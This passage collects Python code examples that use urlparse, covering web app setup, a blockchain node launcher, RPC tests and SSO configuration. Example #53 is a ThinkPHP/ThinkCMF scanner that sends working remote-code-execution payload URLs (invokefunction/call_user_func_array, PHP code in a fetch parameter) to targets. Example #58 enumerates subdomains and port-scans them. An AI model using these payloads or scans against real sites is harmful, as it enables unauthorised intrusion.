            self.about_message,
            "banner_message":
            self.banner_message,
            "extra_footer_scripts":
            self.extra_footer_scripts,
            "jinja2_env":
            jinja_env,
            "build_memory_limit":
            self.build_memory_limit,
            "build_memory_request":
            self.build_memory_request,
            "build_docker_host":
            self.build_docker_host,
            "build_docker_config":
            self.build_docker_config,
            "base_url":
            self.base_url,
            "badge_base_url":
            self.badge_base_url,
            "static_path":
            os.path.join(HERE, "static"),
            "static_url_prefix":
            url_path_join(self.base_url, "static/"),
            "template_variables":
            self.template_variables,
            "executor":
            self.executor,
            "auth_enabled":
            self.auth_enabled,
            "event_log":
            self.event_log,
            "normalized_origin":
            self.normalized_origin,
        })
        if self.auth_enabled:
            self.tornado_settings['cookie_secret'] = os.urandom(32)

        handlers = [
            (r'/metrics', MetricsHandler),
            (r'/versions', VersionHandler),
            (r"/build/([^/]+)/(.+)", BuildHandler),
            (r"/v2/([^/]+)/(.+)", ParameterizedMainHandler),
            (r"/repo/([^/]+)/([^/]+)(/.*)?", LegacyRedirectHandler),
            # for backward-compatible mybinder.org badge URLs
            # /assets/images/badge.svg
            (r'/assets/(images/badge\.svg)', tornado.web.StaticFileHandler, {
                'path': self.tornado_settings['static_path']
            }),
            # /badge.svg
            (r'/(badge\.svg)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            # /badge_logo.svg
            (r'/(badge\_logo\.svg)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            # /logo_social.png
            (r'/(logo\_social\.png)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            # /favicon_XXX.ico
            (r'/(favicon\_fail\.ico)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            (r'/(favicon\_success\.ico)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            (r'/(favicon\_building\.ico)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            (r'/about', AboutHandler),
            (r'/health', HealthHandler, {
                'hub_url': self.hub_url_local
            }),
            (r'/_config', ConfigHandler),
            (r'/', MainHandler),
            (r'.*', Custom404),
        ]
        handlers = self.add_url_prefix(self.base_url, handlers)
        if self.extra_static_path:
            handlers.insert(-1, (re.escape(
                url_path_join(self.base_url, self.extra_static_url_prefix)) +
                                 r"(.*)", tornado.web.StaticFileHandler, {
                                     'path': self.extra_static_path
                                 }))
        if self.auth_enabled:
            oauth_redirect_uri = os.getenv('JUPYTERHUB_OAUTH_CALLBACK_URL') or \
                                 url_path_join(self.base_url, 'oauth_callback')
            oauth_redirect_uri = urlparse(oauth_redirect_uri).path
            handlers.insert(
                -1, (re.escape(oauth_redirect_uri), HubOAuthCallbackHandler))
        self.tornado_app = tornado.web.Application(handlers,
                                                   **self.tornado_settings)
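Only the path component of the OAuth callback URL is used when registering the handler route above; a quick sketch with a hypothetical callback URL:

from urllib.parse import urlparse

callback = 'https://hub.example.org/services/binder/oauth_callback'
assert urlparse(callback).path == '/services/binder/oauth_callback'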
Example #49
0
def run_app(
    address,
    keystore_path,
    gas_price,
    eth_rpc_endpoint,
    tokennetwork_registry_contract_address,
    secret_registry_contract_address,
    endpoint_registry_contract_address,
    listen_address,
    mapped_socket,
    max_unresponsive_time,
    api_address,
    rpc,
    sync_check,
    console,
    password_file,
    web_ui,
    datadir,
    transport,
    matrix_server,
    network_id,
    environment_type,
    unrecoverable_error_should_crash,
    pathfinding_service_address,
    pathfinding_max_paths,
    config=None,
    extra_config=None,
    **kwargs,
):
    # pylint: disable=too-many-locals,too-many-branches,too-many-statements,unused-argument

    from raiden.app import App

    _assert_sql_version()

    if transport == 'udp' and not mapped_socket:
        raise RuntimeError('Missing socket')

    if datadir is None:
        datadir = os.path.join(os.path.expanduser('~'), '.raiden')

    address_hex = to_normalized_address(address) if address else None
    address_hex, privatekey_bin = prompt_account(address_hex, keystore_path,
                                                 password_file)
    address = to_canonical_address(address_hex)

    (listen_host, listen_port) = split_endpoint(listen_address)
    (api_host, api_port) = split_endpoint(api_address)

    config['transport']['udp']['host'] = listen_host
    config['transport']['udp']['port'] = listen_port
    config['console'] = console
    config['rpc'] = rpc
    config['web_ui'] = rpc and web_ui
    config['api_host'] = api_host
    config['api_port'] = api_port
    if mapped_socket:
        config['socket'] = mapped_socket.socket
        config['transport']['udp']['external_ip'] = mapped_socket.external_ip
        config['transport']['udp'][
            'external_port'] = mapped_socket.external_port
    config['transport_type'] = transport
    config['transport']['matrix']['server'] = matrix_server
    config['transport']['udp'][
        'nat_keepalive_retries'] = DEFAULT_NAT_KEEPALIVE_RETRIES
    timeout = max_unresponsive_time / DEFAULT_NAT_KEEPALIVE_RETRIES
    config['transport']['udp']['nat_keepalive_timeout'] = timeout
    config[
        'unrecoverable_error_should_crash'] = unrecoverable_error_should_crash
    config['services'][
        'pathfinding_service_address'] = pathfinding_service_address
    config['services']['pathfinding_max_paths'] = pathfinding_max_paths

    parsed_eth_rpc_endpoint = urlparse(eth_rpc_endpoint)
    if not parsed_eth_rpc_endpoint.scheme:
        eth_rpc_endpoint = f'http://{eth_rpc_endpoint}'

    web3 = _setup_web3(eth_rpc_endpoint)

    rpc_client = JSONRPCClient(
        web3,
        privatekey_bin,
        gas_price_strategy=gas_price,
        block_num_confirmations=DEFAULT_NUMBER_OF_BLOCK_CONFIRMATIONS,
        uses_infura='infura.io' in eth_rpc_endpoint,
    )

    blockchain_service = BlockChainService(
        jsonrpc_client=rpc_client,
        # Not giving the contract manager here, but injecting it later
        # since we first need blockchain service to calculate the network id
    )

    given_network_id = network_id
    node_network_id = blockchain_service.network_id
    known_given_network_id = given_network_id in ID_TO_NETWORKNAME
    known_node_network_id = node_network_id in ID_TO_NETWORKNAME

    if node_network_id != given_network_id:
        if known_given_network_id and known_node_network_id:
            click.secho(
                f"The chosen ethereum network '{ID_TO_NETWORKNAME[given_network_id]}' "
                f"differs from the ethereum client '{ID_TO_NETWORKNAME[node_network_id]}'. "
                "Please update your settings.",
                fg='red',
            )
        else:
            click.secho(
                f"The chosen ethereum network id '{given_network_id}' differs "
                f"from the ethereum client '{node_network_id}'. "
                "Please update your settings.",
                fg='red',
            )
        sys.exit(1)

    config['chain_id'] = given_network_id

    # interpret the provided string argument
    if environment_type == Environment.PRODUCTION:
        # Safe configuration: restrictions for mainnet apply and matrix rooms have to be private
        config['environment_type'] = Environment.PRODUCTION
        config['transport']['matrix']['private_rooms'] = True
    else:
        config['environment_type'] = Environment.DEVELOPMENT

    environment_type = config['environment_type']
    print(f'Raiden is running in {environment_type.value.lower()} mode')

    chain_config = {}
    contract_addresses_known = False
    contracts = dict()
    contracts_version = 'pre_limits' if environment_type == Environment.DEVELOPMENT else None
    config['contracts_path'] = contracts_precompiled_path(contracts_version)
    if node_network_id in ID_TO_NETWORKNAME and ID_TO_NETWORKNAME[
            node_network_id] != 'smoketest':
        deployment_data = get_contracts_deployed(node_network_id,
                                                 contracts_version)
        not_allowed = (  # for now we only disallow mainnet with test configuration
            network_id == 1 and environment_type == Environment.DEVELOPMENT)
        if not_allowed:
            click.secho(
                f'The chosen network ({ID_TO_NETWORKNAME[node_network_id]}) is not a testnet, '
                'but the "development" environment was selected.\n'
                'This is not allowed. Please start again with a safe environment setting '
                '(--environment production).',
                fg='red',
            )
            sys.exit(1)

        contracts = deployment_data['contracts']
        contract_addresses_known = True

    blockchain_service.inject_contract_manager(
        ContractManager(config['contracts_path']))

    if sync_check:
        check_synced(blockchain_service, known_node_network_id)

    contract_addresses_given = (
        tokennetwork_registry_contract_address is not None
        and secret_registry_contract_address is not None
        and endpoint_registry_contract_address is not None)

    if not contract_addresses_given and not contract_addresses_known:
        click.secho(
            f"There are no known contract addresses for network id '{given_network_id}'. "
            "Please provide them on the command line or in the configuration file.",
            fg='red',
        )
        sys.exit(1)

    try:
        token_network_registry = blockchain_service.token_network_registry(
            tokennetwork_registry_contract_address or to_canonical_address(
                contracts[CONTRACT_TOKEN_NETWORK_REGISTRY]['address'], ), )
    except ContractVersionMismatch as e:
        handle_contract_version_mismatch(e)
    except AddressWithoutCode:
        handle_contract_no_code('token network registry',
                                tokennetwork_registry_contract_address)
    except AddressWrongContract:
        handle_contract_wrong_address(
            'token network registry',
            tokennetwork_registry_contract_address,
        )

    try:
        secret_registry = blockchain_service.secret_registry(
            secret_registry_contract_address or to_canonical_address(
                contracts[CONTRACT_SECRET_REGISTRY]['address'], ), )
    except ContractVersionMismatch as e:
        handle_contract_version_mismatch(e)
    except AddressWithoutCode:
        handle_contract_no_code('secret registry',
                                secret_registry_contract_address)
    except AddressWrongContract:
        handle_contract_wrong_address('secret registry',
                                      secret_registry_contract_address)

    database_path = os.path.join(
        datadir,
        f'node_{pex(address)}',
        f'netid_{given_network_id}',
        f'network_{pex(token_network_registry.address)}',
        f'v{RAIDEN_DB_VERSION}_log.db',
    )
    config['database_path'] = database_path

    print(
        '\nYou are connected to the \'{}\' network and the DB path is: {}'.
        format(
            ID_TO_NETWORKNAME.get(given_network_id, given_network_id),
            database_path,
        ), )

    discovery = None
    if transport == 'udp':
        transport, discovery = _setup_udp(
            config,
            blockchain_service,
            address,
            contracts,
            endpoint_registry_contract_address,
        )
    elif transport == 'matrix':
        transport = _setup_matrix(config)
    else:
        raise RuntimeError(f'Unknown transport type "{transport}" given')

    raiden_event_handler = RaidenEventHandler()
    message_handler = MessageHandler()

    try:
        if 'contracts' in chain_config:
            start_block = chain_config['contracts']['TokenNetworkRegistry'][
                'block_number']
        else:
            start_block = 0

        raiden_app = App(
            config=config,
            chain=blockchain_service,
            query_start_block=start_block,
            default_registry=token_network_registry,
            default_secret_registry=secret_registry,
            transport=transport,
            raiden_event_handler=raiden_event_handler,
            message_handler=message_handler,
            discovery=discovery,
        )
    except RaidenError as e:
        click.secho(f'FATAL: {e}', fg='red')
        sys.exit(1)

    try:
        raiden_app.start()
    except RuntimeError as e:
        click.secho(f'FATAL: {e}', fg='red')
        sys.exit(1)
    except filelock.Timeout:
        name_or_id = ID_TO_NETWORKNAME.get(given_network_id, given_network_id)
        click.secho(
            f'FATAL: Another Raiden instance already running for account {address_hex} on '
            f'network id {name_or_id}',
            fg='red',
        )
        sys.exit(1)

    return raiden_app
Example #50
0
def is_absolute(url):
    return bool(urlparse(url).netloc)  #https://stackoverflow.com/questions/8357098/how-can-i-check-if-a-url-is-absolute-using-python
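A short usage sketch (hypothetical URLs) combining is_absolute() with urljoin to resolve links scraped from a page:

from urllib.parse import urljoin

def absolutize(base_url, href):
    return href if is_absolute(href) else urljoin(base_url, href)

# absolutize('https://example.org/docs/index.html', 'style.css')
# -> 'https://example.org/docs/style.css'
# absolutize('https://example.org/docs/index.html', 'https://cdn.example.org/app.js')
# -> 'https://cdn.example.org/app.js'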
Example #51
0
 def filename(self):
     return urlparse(self.__url).path.rsplit('/', 1)[-1]
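A quick sketch (hypothetical URL) of what the property above returns; the query string and fragment never reach `path`, so only the final path segment is kept:

from urllib.parse import urlparse

url = 'https://example.org/files/archive/report.pdf?dl=1'
assert urlparse(url).path.rsplit('/', 1)[-1] == 'report.pdf'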
Example #52
0
    def run_test(self):

        #################################################
        # lowlevel check for http persistent connection #
        #################################################
        url = urlparse.urlparse(self.nodes[0].url)
        authpair = url.username + ':' + url.password
        headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

        conn = httplib.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!

        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out2 = conn.getresponse().read()
        assert_equal('"error":null' in out2,
                     True)  #must also respond with a correct json-rpc message
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!
        conn.close()

        #same should be if we add keep-alive because this should be the std. behaviour
        headers = {
            "Authorization": "Basic " + base64.b64encode(authpair),
            "Connection": "keep-alive"
        }

        conn = httplib.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!

        #send 2nd request without closing connection
        conn.request('POST', '/', '{"method": "getchaintips"}', headers)
        out2 = conn.getresponse().read()
        assert_equal('"error":null' in out2,
                     True)  #must also respond with a correct json-rpc message
        assert_equal(
            conn.sock != None,
            True)  #according to http/1.1 connection must still be open!
        conn.close()

        #now do the same with "Connection: close"
        headers = {
            "Authorization": "Basic " + base64.b64encode(authpair),
            "Connection": "close"
        }

        conn = httplib.HTTPConnection(url.hostname, url.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None,
            False)  #now the connection must be closed after the response

        #node1 (2nd node) is running with disabled keep-alive option
        urlNode1 = urlparse.urlparse(self.nodes[1].url)
        authpair = urlNode1.username + ':' + urlNode1.password
        headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

        conn = httplib.HTTPConnection(urlNode1.hostname, urlNode1.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)

        #node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
        urlNode2 = urlparse.urlparse(self.nodes[2].url)
        authpair = urlNode2.username + ':' + urlNode2.password
        headers = {"Authorization": "Basic " + base64.b64encode(authpair)}

        conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
        out1 = conn.getresponse().read()
        assert_equal('"error":null' in out1, True)
        assert_equal(
            conn.sock != None, True
        )  #connection must still be open because civilbitd should use keep-alive by default

        # Check excessive request size
        conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x' * 1000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, httplib.NOT_FOUND)

        conn = httplib.HTTPConnection(urlNode2.hostname, urlNode2.port)
        conn.connect()
        conn.request('GET', '/' + ('x' * 10000), '', headers)
        out1 = conn.getresponse()
        assert_equal(out1.status, httplib.BAD_REQUEST)
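The test above builds its Basic-auth header from the pieces urlparse exposes on an RPC URL; a minimal sketch with hypothetical credentials (Python 3 import shown, the example itself uses the Python 2 urlparse module):

from urllib.parse import urlparse

url = urlparse('http://rpcuser:rpcpass@127.0.0.1:8332')
assert url.username == 'rpcuser'
assert url.password == 'rpcpass'
assert url.hostname == '127.0.0.1'
assert url.port == 8332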
Example #53
0
    def run_detect(self, url):
        if not urlparse(url).scheme:
            url = 'https://' + url
        try:
            #thinkphp 3.0 / ThinkPHP 2.1 { Fast & Simple OOP PHP Framework } rce; no reliable fingerprint for tp5.1 found yet, so rely on the error page for now
            rep = requests.get(url + "/index.php/herxdjhrelzfndk.html",
                               timeout=10,
                               verify=False)
            if "ThinkPHP" in rep.text and "2.1" in rep.text and "{ Fast & Simple OOP PHP Framework }" in rep.text:
                #if "phpinfo()" in requests.get(url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D").text:
                cprint(
                    '[thinkphp 3.0 rce ] {}'.format(
                        url +
                        "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"),
                    'red')
                self.vul_list.append([
                    'thinkphp 3.0',
                    url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
                ])
#            else:
#                cprint('[thinkphp 3.0] {}'.format(url), 'red')
#                self.vul_list.append(['thinkphp 3.0', url])
            if "ThinkPHP" in rep.text and "5.1" in rep.text and "www.thinkphp.cn" in rep.text:
                #if "phpinfo()" in requests.get(url + "/index.php?s=index/\\think\Request/input&filter=phpinfo&data=1").text:
                cprint(
                    '[thinkphp 5.1 rce ] {}'.format(
                        url +
                        "/index.php?s=index/\\think\Request/input&filter=phpinfo&data=1"
                    ), 'red')
                self.vul_list.append([
                    'thinkphp 5.1',
                    url + "/index.php/Index/index/name/$%7B@phpinfo%28%29%7D"
                ])
#            else:
#                cprint('[thinkphp 5.1] {}'.format(url), 'red')
#                self.vul_list.append(['thinkphp 5.1', url])
# thinkphp 3.2: detect rce using 4e5e5d7364f443e28fbf0d3ae744a59a
            rep = requests.get(url +
                               "/index.php?c=4e5e5d7364f443e28fbf0d3ae744a59a",
                               timeout=10,
                               verify=False)

            if rep.status_code == 200 and "PNG" in rep.text:
                #if "phpinfo()" in requests.get(url + "/?a=fetch&content=<?php%20phpinfo();die();").text:
                cprint(
                    '[thinkcmf 3.2 rce ] {}'.format(
                        url + "/?a=fetch&content=<?php%20phpinfo();die();"),
                    'red')
                self.vul_list.append([
                    'thinkcmf 3.2',
                    url + "/?a=fetch&content=<?php%20phpinfo();die();"
                ])
#           else:
#               cprint('[thinkphp 3.2] {}'.format(url), 'red')
#               self.vul_list.append(['thinkphp 3.2', url])
# thinkphp 5.0: detect using index.php?s=captcha
            rep = requests.get(url + "/index.php?s=captcha",
                               timeout=10,
                               verify=False)
            if rep.status_code == 200 and "PNG" in rep.text:
                #if "phpinfo()" in requests.get(url + "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1").text:
                cprint(
                    '[thinkphp 5.0 rce ] {}'.format(
                        url +
                        "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
                    ), 'red')
                self.vul_list.append([
                    'thinkphp 5.0', url +
                    "/index.php/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
                ])


#            else:
#               cprint('[thinkphp 5.0] {}'.format(url), 'red')
#               self.vul_list.append(['thinkphp 5.0', url])

        except Exception as e:
            pass
Example #54
0
    def __init__(self, url, dist=None, comp=None, arch='iphoneos-arm'):
        self.url = url

        if dist is None:
            release_path = 'Release'
        else:
            release_path = '/'.join(('dists', dist, 'Release'))

        release = self._fetch_relative(release_path, verify=False)
        if release.ok:
            self._release = Utils.asstring_to_dict(release.text)
            self.name = self._release['Origin']
            self.label = self._release.get('Label', self.name)
        else:
            self._release = dict()
            urlparsed = urlparse(self.url)
            self.name = urlparsed.netloc + urlparsed.path
            self.label = self.name

        self._integrity_by_file = dict()

        if 'MD5Sum' in self._release:
            for l in self._release['MD5Sum'].split('\n'):
                l = l.strip()
                if not l:
                    continue

                md5sum, size, name = map(str.strip, l.split())

                self._integrity_by_file[name] = {
                    'size': int(size),
                    'md5': md5sum
                }

        self.packages = list()
        self.packages_by_name = dict()

        if dist is None or comp is None:
            packages_path = 'Packages'
        else:
            packages_path = '/'.join(('dists', dist, comp, 'binary-' + arch, 'Packages'))

        for pkgstr in self._fetch_bz2(packages_path).split('\n\n'):
            if not pkgstr:
                continue
            
            pkg = Package(pkgstr, self)

            self.packages.append(pkg)

            if pkg.name in self.packages_by_name:
                # print('warning: duplicate package %s' % pkg, end=' -- ')

                prevpkg = self.packages_by_name[pkg.name]
                if pkg.version > prevpkg.version:
                    # print('overriding prev (%s) since prev is older' % prevpkg)
                    self.packages_by_name[pkg.name] = pkg
                else:
                    pass
                    # print('not overriding prev (%s) since prev is newer' % prevpkg)
            else:
                self.packages_by_name[pkg.name] = pkg
Example #55
0
    def _get_unauthenticated_response(self, url, method='post'):
        """Get auth type by tasting headers from the server. Do POST requests be default. HEAD is too error prone, and
        some servers are set up to redirect to OWA on all requests except POST to the autodiscover endpoint.
        """
        # We are connecting to untrusted servers here, so take necessary precautions.
        hostname = urlparse(url).netloc
        if not is_valid_hostname(hostname,
                                 timeout=AutodiscoverProtocol.TIMEOUT):
            # 'requests' is really bad at reporting that a hostname cannot be resolved. Let's check this separately.
            # Don't retry on DNS errors. They will most likely be persistent.
            raise TransportError('%r has no DNS entry' % hostname)

        kwargs = dict(url=url,
                      headers=DEFAULT_HEADERS.copy(),
                      allow_redirects=False,
                      timeout=AutodiscoverProtocol.TIMEOUT)
        if method == 'post':
            kwargs['data'] = Autodiscover.payload(email=self.email)
        retry = 0
        t_start = time.monotonic()
        while True:
            _back_off_if_needed(self.INITIAL_RETRY_POLICY.back_off_until)
            log.debug('Trying to get response from %s', url)
            with AutodiscoverProtocol.raw_session() as s:
                try:
                    r = getattr(s, method)(**kwargs)
                    r.close()  # Release memory
                    break
                except TLS_ERRORS as e:
                    # Don't retry on TLS errors. They will most likely be persistent.
                    raise TransportError(str(e))
                except CONNECTION_ERRORS as e:
                    r = DummyResponse(url=url,
                                      headers={},
                                      request_headers=kwargs['headers'])
                    total_wait = time.monotonic() - t_start
                    if _may_retry_on_error(
                            response=r,
                            retry_policy=self.INITIAL_RETRY_POLICY,
                            wait=total_wait):
                        log.debug(
                            "Connection error on URL %s (retry %s, error: %s). Cool down",
                            url, retry, e)
                        self.INITIAL_RETRY_POLICY.back_off(self.RETRY_WAIT)
                        retry += 1
                        continue
                    else:
                        log.debug("Connection error on URL %s: %s", url, e)
                        raise TransportError(str(e))
        try:
            auth_type = get_auth_method_from_response(response=r)
        except UnauthorizedError:
            # Failed to guess the auth type
            auth_type = NOAUTH
        if r.status_code in (301, 302):
            if 'location' in r.headers:
                # Make the redirect URL absolute
                try:
                    r.headers['location'] = get_redirect_url(r)
                except TransportError:
                    del r.headers['location']
        return auth_type, r
Example #56
0
def _is_youtube_url(url):
    """Returns true if the URL is to youtube."""
    parsed_url = urlparse(url)
    netloc = parsed_url.netloc
    return netloc in ["youtu.be", "youtube.com", "www.youtube.com"]
Example #57
0
log.setLevel(level)

ch = logging.StreamHandler()
ch.setLevel(level)

format = '%(asctime)s %(levelname)s: %(message)s'
formatter = logging.Formatter(format)

ch.setFormatter(formatter)

log.addHandler(ch)

#--------------------------------------------------------------------

# Pick apart the URL
parts = urlparse(args.pr)
path = parts.path
vals = path.split('/')
org  = vals[1]
repo = vals[2]
pull = vals[3]
num  = vals[4]

full_name = os.path.join(org, repo)
log.debug("Getting repo {r}...".format(r=full_name))
repo = g.get_repo(full_name)

log.debug("Getting PR {pr}...".format(pr=num))
pr = repo.get_pull(int(num))

log.info("PR {num}: {title}".format(num=num, title=pr.title))
Example #58
0
def main(domain, threads, savefile, ports, silent, verbose, enable_bruteforce, engines):
    bruteforce_list = set()
    search_list = set()

    if is_windows:
        subdomains_queue = list()
    else:
        subdomains_queue = multiprocessing.Manager().list()

    # Check Bruteforce Status
    if enable_bruteforce or enable_bruteforce is None:
        enable_bruteforce = True

    # Validate domain
    domain_check = re.compile(r"^(http|https)?[a-zA-Z0-9]+([\-\.]{1}[a-zA-Z0-9]+)*\.[a-zA-Z]{2,}$")
    if not domain_check.match(domain):
        if not silent:
            print(R + "Error: Please enter a valid domain" + W)
        return []

    if not domain.startswith('http://') and not domain.startswith('https://'):
        domain = 'http://' + domain

    parsed_domain = urlparse.urlparse(domain)

    if not silent:
        print(B + "[-] Enumerating subdomains now for %s" % parsed_domain.netloc + W)

    if verbose and not silent:
        print(Y + "[-] verbosity is enabled, will show the subdomains results in realtime" + W)

    supported_engines = {'baidu': BaiduEnum,
                         'yahoo': YahooEnum,
                         'google': GoogleEnum,
                         'bing': BingEnum,
                         'ask': AskEnum,
                         'netcraft': NetcraftEnum,
                         'dnsdumpster': DNSdumpster,
                         'virustotal': Virustotal,
                         'threatcrowd': ThreatCrowd,
                         'ssl': CrtSearch,
                         'passivedns': PassiveDNS
                         }

    chosenEnums = []

    if engines is None:
        chosenEnums = [
            BaiduEnum, YahooEnum, GoogleEnum, BingEnum, AskEnum,
            NetcraftEnum, DNSdumpster, Virustotal, ThreatCrowd,
            CrtSearch, PassiveDNS
        ]
    else:
        engines = engines.split(',')
        for engine in engines:
            if engine.lower() in supported_engines:
                chosenEnums.append(supported_engines[engine.lower()])

    # Start the engines enumeration
    enums = [enum(domain, [], q=subdomains_queue, silent=silent, verbose=verbose) for enum in chosenEnums]
    for enum in enums:
        enum.start()
    for enum in enums:
        enum.join()

    subdomains = set(subdomains_queue)
    for subdomain in subdomains:
        search_list.add(subdomain)

    if enable_bruteforce:
        if not silent:
            print(G + "[-] Starting bruteforce module now using subbrute.." + W)
        record_type = False
        path_to_file = os.path.dirname(os.path.realpath(__file__))
        subs = os.path.join(path_to_file, 'subbrute', 'names.txt')
        resolvers = os.path.join(path_to_file, 'subbrute', 'resolvers.txt')
        process_count = threads
        output = False
        json_output = False
        bruteforce_list = subbrute.print_target(parsed_domain.netloc, record_type, subs, resolvers, process_count, output, json_output, search_list, verbose)

    subdomains = search_list.union(bruteforce_list)

    if subdomains:
        subdomains = sorted(subdomains, key=subdomain_sorting_key)

        if savefile:
            write_file(savefile, subdomains)

        if not silent:
            print(Y + "[-] Total Unique Subdomains Found: %s" % len(subdomains) + W)

        if ports:
            if not silent:
                print(G + "[-] Start port scan now for the following ports: %s%s" % (Y, ports) + W)
            ports = ports.split(',')
            pscan = portscan(subdomains, ports)
            pscan.run()

        elif not silent:
            for subdomain in subdomains:
                print(G + subdomain + W)
    return subdomains
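Why the code above prepends 'http://' before parsing: without a scheme, urlparse leaves netloc empty and puts the host in path. A tiny sketch with a hypothetical domain:

from urllib.parse import urlparse

assert urlparse('example.com').netloc == ''
assert urlparse('example.com').path == 'example.com'
assert urlparse('http://example.com').netloc == 'example.com'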
Example #59
0
def handle_sso_command(cmd):
    if cmd['prefix'] not in ['dashboard sso enable saml2',
                             'dashboard sso disable',
                             'dashboard sso status',
                             'dashboard sso show saml2',
                             'dashboard sso setup saml2']:
        return -errno.ENOSYS, '', ''

    if not python_saml_imported:
        return -errno.EPERM, '', 'Required library not found: `python3-saml`'

    if cmd['prefix'] == 'dashboard sso enable saml2':
        try:
            Saml2Settings(mgr.SSO_DB.saml2.onelogin_settings)
        except Saml2Error:
            return -errno.EPERM, '', 'Single Sign-On is not configured: ' \
                'use `ceph dashboard sso setup saml2`'
        mgr.SSO_DB.protocol = 'saml2'
        mgr.SSO_DB.save()
        return 0, 'SSO is "enabled" with "SAML2" protocol.', ''

    if cmd['prefix'] == 'dashboard sso disable':
        mgr.SSO_DB.protocol = ''
        mgr.SSO_DB.save()
        return 0, 'SSO is "disabled".', ''

    if cmd['prefix'] == 'dashboard sso status':
        if mgr.SSO_DB.protocol == 'saml2':
            return 0, 'SSO is "enabled" with "SAML2" protocol.', ''

        return 0, 'SSO is "disabled".', ''

    if cmd['prefix'] == 'dashboard sso show saml2':
        return 0, json.dumps(mgr.SSO_DB.saml2.to_dict()), ''

    if cmd['prefix'] == 'dashboard sso setup saml2':
        ceph_dashboard_base_url = cmd['ceph_dashboard_base_url']
        idp_metadata = cmd['idp_metadata']
        idp_username_attribute = _get_optional_attr(cmd, 'idp_username_attribute', 'uid')
        idp_entity_id = _get_optional_attr(cmd, 'idp_entity_id', None)
        sp_x_509_cert_path = _get_optional_attr(cmd, 'sp_x_509_cert', '')
        sp_private_key_path = _get_optional_attr(cmd, 'sp_private_key', '')
        if sp_x_509_cert_path and not sp_private_key_path:
            return -errno.EINVAL, '', 'Missing parameter `sp_private_key`.'
        if not sp_x_509_cert_path and sp_private_key_path:
            return -errno.EINVAL, '', 'Missing parameter `sp_x_509_cert`.'
        has_sp_cert = sp_x_509_cert_path != "" and sp_private_key_path != ""
        if has_sp_cert:
            try:
                with open(sp_x_509_cert_path, 'r', encoding='utf-8') as f:
                    sp_x_509_cert = f.read()
            except FileNotFoundError:
                return -errno.EINVAL, '', '`{}` not found.'.format(sp_x_509_cert_path)
            try:
                with open(sp_private_key_path, 'r', encoding='utf-8') as f:
                    sp_private_key = f.read()
            except FileNotFoundError:
                return -errno.EINVAL, '', '`{}` not found.'.format(sp_private_key_path)
        else:
            sp_x_509_cert = ''
            sp_private_key = ''

        if os.path.isfile(idp_metadata):
            warnings.warn(
                "Please prepend 'file://' to indicate a local SAML2 IdP file", DeprecationWarning)
            with open(idp_metadata, 'r', encoding='utf-8') as f:
                idp_settings = Saml2Parser.parse(f.read(), entity_id=idp_entity_id)
        elif parse.urlparse(idp_metadata)[0] in ('http', 'https', 'file'):
            idp_settings = Saml2Parser.parse_remote(
                url=idp_metadata, validate_cert=False, entity_id=idp_entity_id)
        else:
            idp_settings = Saml2Parser.parse(idp_metadata, entity_id=idp_entity_id)

        url_prefix = prepare_url_prefix(mgr.get_module_option('url_prefix', default=''))
        settings = {
            'sp': {
                'entityId': '{}{}/auth/saml2/metadata'.format(ceph_dashboard_base_url, url_prefix),
                'assertionConsumerService': {
                    'url': '{}{}/auth/saml2'.format(ceph_dashboard_base_url, url_prefix),
                    'binding': "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
                },
                'attributeConsumingService': {
                    'serviceName': "Ceph Dashboard",
                    "serviceDescription": "Ceph Dashboard Service",
                    "requestedAttributes": [
                        {
                            "name": idp_username_attribute,
                            "isRequired": True
                        }
                    ]
                },
                'singleLogoutService': {
                    'url': '{}{}/auth/saml2/logout'.format(ceph_dashboard_base_url, url_prefix),
                    'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
                },
                "x509cert": sp_x_509_cert,
                "privateKey": sp_private_key
            },
            'security': {
                "nameIdEncrypted": has_sp_cert,
                "authnRequestsSigned": has_sp_cert,
                "logoutRequestSigned": has_sp_cert,
                "logoutResponseSigned": has_sp_cert,
                "signMetadata": has_sp_cert,
                "wantMessagesSigned": has_sp_cert,
                "wantAssertionsSigned": has_sp_cert,
